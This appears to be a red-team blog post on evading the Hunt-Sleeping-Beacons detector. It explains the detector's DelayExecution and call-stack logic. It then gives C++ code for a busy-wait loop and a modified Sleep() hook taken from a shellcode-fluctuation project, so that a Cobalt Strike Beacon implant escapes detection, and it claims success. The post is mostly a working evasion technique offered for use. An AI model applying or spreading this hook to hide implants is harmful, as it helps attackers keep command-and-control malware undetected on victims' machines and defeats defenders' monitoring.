Evading Hunt-Sleeping-Beacons

Reference: https://github.com/thefLink/Hunt-Sleeping-Beacons

POC repo

https://github.com/CodeXTF2/BusySleepBeacon

How does the technique work?

A well-known behaviour of the Beacon payload is that it calls the Sleep() WinAPI function to sleep between callbacks. A project on GitHub named Hunt-Sleeping-Beacons detects sleeping Beacon payloads based on the following behaviour:

  • The Beacon payload calls Sleep() to sleep.

  • The Sleep() function puts the current thread into a wait with the reason "DelayExecution".

  • The call stack leading to Sleep() contains saved instruction pointers that cannot be mapped to a module on disk, either because the address does not belong to any module or because the module has been modified at runtime.

According to the project repo, the detection logic is as follows:

The metric to detect this kind of malware is thus:

  1. Enumerate all Threads which state is set to: DelayExecution

  2. Analyze the callstack of the thread for suspicious memory addresses

  3. If a thread is in DelayExecution and one of the return addresses in the callstack cannot be associated with a module on disk its probably a running beacon

  4. To identify the associated module of each saved instruction pointer, I make use of SymGetModuleInfo64. This also seems to work fine against ideas such as Phantom Dll Hollowing.
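The decision rule in steps 1 to 3 can be sketched in portable C++. This is only an illustration of the logic, not the tool's actual code: the types WaitReason, ModuleRange and ThreadSnapshot and both function names are hypothetical, the thread and module data are assumed to have been collected already, and the "module modified at runtime" check is left out.

```cpp
#include <cstdint>
#include <vector>

// Hypothetical, simplified view of what a scanner has collected per thread.
enum class WaitReason { Executive, DelayExecution, UserRequest, Other };

struct ModuleRange {
    std::uint64_t base; // load address of a module backed by a file on disk
    std::uint64_t size; // size of the mapped image in bytes
};

struct ThreadSnapshot {
    WaitReason waitReason;
    std::vector<std::uint64_t> returnAddresses; // saved instruction pointers
};

// True when addr falls inside any known disk-backed module.
bool IsBackedByModule(std::uint64_t addr, const std::vector<ModuleRange>& modules) {
    for (const ModuleRange& m : modules) {
        if (addr >= m.base && addr - m.base < m.size) {
            return true;
        }
    }
    return false;
}

// Steps 1-3: only threads waiting with DelayExecution are considered, and
// a single unbacked return address is enough to flag the thread.
bool LooksLikeSleepingBeacon(const ThreadSnapshot& t, const std::vector<ModuleRange>& modules) {
    if (t.waitReason != WaitReason::DelayExecution) {
        return false;
    }
    for (std::uint64_t addr : t.returnAddresses) {
        if (!IsBackedByModule(addr, modules)) {
            return true;
        }
    }
    return false;
}
```

Note that both conditions must hold: a thread with an unbacked return address is ignored by this rule if its wait reason is anything other than DelayExecution.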

How effective are current evasions?

Current implementations of sleep protection, such as Heap + Stack encryption, are unrelated to this specific behaviour of Beacon, and do not evade this project. The thread state is unaffected by heap or stack contents, and the saved instruction pointers still do not map to a module on disk.

How do we evade this?

The first way, as the repo author himself explains, is module stomping. This probably works because the saved instruction pointers can then be mapped to a module on disk (the whole point of module stomping is to run the payload from inside a legitimately loaded DLL).

However, another way I found to bypass this project (and the detection technique altogether) is to keep the thread out of the DelayExecution state in the first place.

First, let's understand what DelayExecution actually is.

When a Windows thread blocks, the kernel puts it into the Waiting state and records a wait reason describing why it is waiting. DelayExecution is one of these wait reasons, and it is the one recorded when a thread sleeps via Sleep(). The wait reasons are as follows:

enum KWAIT_REASON
{
    Executive,
    FreePage,
    PageIn,
    PoolAllocation,
    DelayExecution,
    Suspended,
    UserRequest,
    WrExecutive,
    WrFreePage,
    WrPageIn,
    WrPoolAllocation,
    WrDelayExecution,
    WrSuspended,
    WrUserRequest,
    WrEventPair,
    WrQueue,
    WrLpcReceive,
    WrLpcReply,
    WrVirtualMemory,
    WrPageOut,
    WrRendezvous,
    Spare2,
    Spare3,
    Spare4,
    Spare5,
    Spare6,
    WrKernel,
    MaximumWaitReason
};

Since this detection relies on Sleep() putting the thread into a wait with the reason DelayExecution, all we need to do is delay for the same amount of time without calling Sleep() (or anything else that results in DelayExecution).

A simple way to do this is a busy wait: a loop that delays execution while keeping the CPU occupied, so the thread keeps running instead of entering a wait state. I took some busy wait code from the following post to test this theory.

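#include <ctime>

// Busy-waits for roughly Time milliseconds by polling clock().
// Returns false if clock() fails, true once the interval has elapsed.
bool Wait(const unsigned long &Time)
{
    const clock_t Start = clock();
    if (Start == clock_t(-1)) // clock() returns -1 on failure
        return false;
    for (;;)
    {
        const clock_t Now = clock();
        if (Now == clock_t(-1))
            return false;
        // Convert elapsed ticks to milliseconds in double precision,
        // which avoids the rounding and signed/unsigned issues of float math.
        const double ElapsedMs = double(Now - Start) * 1000.0 / CLOCKS_PER_SEC;
        if (ElapsedMs >= double(Time))
            return true;
    }
}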
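As an alternative sketch (not the code used in the POC), the same kind of loop can be written against std::chrono::steady_clock, which is monotonic and has a well-defined unit, so no tick-to-millisecond conversion is needed. The name BusyWaitMs is hypothetical.

```cpp
#include <chrono>

// Hypothetical helper: spins until at least `ms` milliseconds have elapsed
// on the monotonic clock, then returns the elapsed time in milliseconds.
long long BusyWaitMs(unsigned long ms) {
    using Clock = std::chrono::steady_clock;
    const auto start = Clock::now();
    const auto target = std::chrono::milliseconds(ms);

    auto elapsed = Clock::now() - start;
    while (elapsed < target) {
        // No sleep or yield here: the thread stays runnable the whole time.
        elapsed = Clock::now() - start;
    }
    return std::chrono::duration_cast<std::chrono::milliseconds>(elapsed).count();
}
```

Either version keeps one CPU core busy for the whole interval, which is the trade-off of a busy wait compared with Sleep().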

Now, how do we make Beacon use our busy wait instead of Sleep()?

I stole more code from GitHub, in this case mgeeky's ShellcodeFluctuation project. This is a standard sleep protection implementation, but what we want from it is the hook on Sleep(), which lets us control the sleep behaviour.

I modified the following function of his project (comments omitted):

void WINAPI MySleep(DWORD dwMilliseconds)
{
    const LPVOID caller = (LPVOID)_ReturnAddress();
    initializeShellcodeFluctuation(caller);
    shellcodeEncryptDecrypt(caller);
    log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n");
    HookTrampolineBuffers buffers = { 0 };
    buffers.originalBytes = g_hookedSleep.sleepStub;
    buffers.originalBytesSize = sizeof(g_hookedSleep.sleepStub);
    fastTrampoline(false, (BYTE*)::Sleep, (void*)&MySleep, &buffers);

    // Perform sleep emulating originally hooked functionality.
    ::Sleep(dwMilliseconds);

    if (g_fluctuate == FluctuateToRW)
    {
        shellcodeEncryptDecrypt((LPVOID)caller);
    }
    else
    {
    }
    fastTrampoline(true, (BYTE*)::Sleep, (void*)&MySleep);
}

This is the function that the hook redirects execution to whenever Sleep() is called. It performs its sleep protection routines and then calls the real Sleep() to sleep. We can replace that call with a call to our busy wait instead:

void WINAPI MySleep(DWORD dwMilliseconds)
{
    const LPVOID caller = (LPVOID)_ReturnAddress();
    initializeShellcodeFluctuation(caller);
    shellcodeEncryptDecrypt(caller);
    log("\n===> MySleep(", std::dec, dwMilliseconds, ")\n");
    HookTrampolineBuffers buffers = { 0 };
    buffers.originalBytes = g_hookedSleep.sleepStub;
    buffers.originalBytesSize = sizeof(g_hookedSleep.sleepStub);
    fastTrampoline(false, (BYTE*)::Sleep, (void*)&MySleep, &buffers);

    // Busy-wait instead of calling ::Sleep(), so the thread does not enter DelayExecution.
    Wait(dwMilliseconds);

    if (g_fluctuate == FluctuateToRW)
    {
        shellcodeEncryptDecrypt((LPVOID)caller);
    }
    else
    {
    }
    fastTrampoline(true, (BYTE*)::Sleep, (void*)&MySleep);
}

Let's test this evasion!

Default beacon:

With busy wait:

Hunt-Sleeping-Beacons evaded!
